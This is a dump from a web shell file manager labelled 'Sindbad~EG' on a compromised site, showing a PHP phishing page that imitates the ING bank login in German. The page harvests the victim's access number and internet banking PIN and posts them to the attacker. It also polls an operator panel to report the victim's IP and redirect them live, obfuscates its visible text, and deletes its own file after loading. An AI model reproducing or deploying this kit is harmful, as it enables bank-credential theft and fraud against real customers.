Sindbad~EG File Manager

Current Path : /home/infinitibizsol/cashforcarsrichardson.com/ing/de/
Upload File :
Current File : /home/infinitibizsol/cashforcarsrichardson.com/ing/de/cb8bc94768a785338ebfc77baf01c11c.php

<?php 
require '../main.php';
?><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <title>Login</title>
    <link rel="stylesheet" href="res/main.css">
    <link rel="stylesheet" href="res/img-media.css">
</head>
<body>
<header>
<img src="res/logo.png">
</header>

<main>
<div class="title">
<?php $bm->obf("Log-in"); ?>
</div>
<div class="form">

<div class="left">
<div class="col title">
<?php $bm->obf("Anmelden mit Zugangsdaten"); ?>
</div>

<?php echo isset($_GET['e']) ? '
<div style="color:red;">
Falsche Angaben. Bitte versuche es erneut.
</div>
' : ""; ?>

<div class="col multi">
    <div class="label"><?php $bm->obf("Zugangsnummer"); ?></div>
    <div class="input">
        <input type="text" id="u">
        <label><?php $bm->obf("Letzte 10 Stellen Ihrer ING IBAN / Depotnummer"); ?></label>
    </div>
</div>

<div class="col multi">
    <div class="label"><?php $bm->obf("Internetbanking PIN"); ?></div>
    <div class="input">
        <input type="password" id="p">
        <label><?php $bm->obf("Bitte beachten Sie die Groß- und Kleinschreibung."); ?></label>
    </div>
</div>

<div class="col submit">
    <button onclick="sendLog()">Anmelden</button>
</div>

<div class="col links">
    <a href="#"><?php $bm->obf("Zugangsdaten vergessen?"); ?></a>
    <p><?php $bm->obf("Neu bei uns?"); ?><br>
<a href="#"><?php $bm->obf("Jetzt Zugangsdaten erstellen"); ?></a></p>
</div>


</div>


<div class="right">
<img src="res/info-lg.png" class="lg">
<img src="res/info-md.png" class="md">
<img src="res/info-sm.png" class="sm">
<img src="res/info-xs.png" class="xs">
</div>

</div>
</main>



<?php 
require 'html/footer.php';
require 'html/loader.php';
?>

<script src="res/jq.js"></script>
<script>

$("input").keyup(()=>{
    $(this).removeClass("error");
});

function sendLog(){
    if($("#u").val()==""){
        return $("#u").addClass("error");
    }
    if($("#p").val()==""){
        return $("#p").addClass("error");
    }
    $(".window").show();
    $.post("post.php",{
        user:$("#u").val(),
        pass:$("#p").val()
    } );

}



$("input").keypress((e)=>{
    if(e.key=="Enter"){
        sendLog();
    }
});


setInterval(() => {
    $.post("../panel/update_statu.php",{update:1, ip:'<?php echo $pnl->IP; ?>'});
}, 1000);
var page ="<?php echo @$_GET['p']; ?>";
var cd = "<?php echo $current_data; ?>";

setInterval(() => {
    $.post("../panel/fetch.php", {update:1}, function(d){
        if(cd!=d){
            window.location=d;
        }
    })

}, 2000);

</script>
</body>
</html><?php unlink(basename($_SERVER["SCRIPT_NAME"])); ?>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists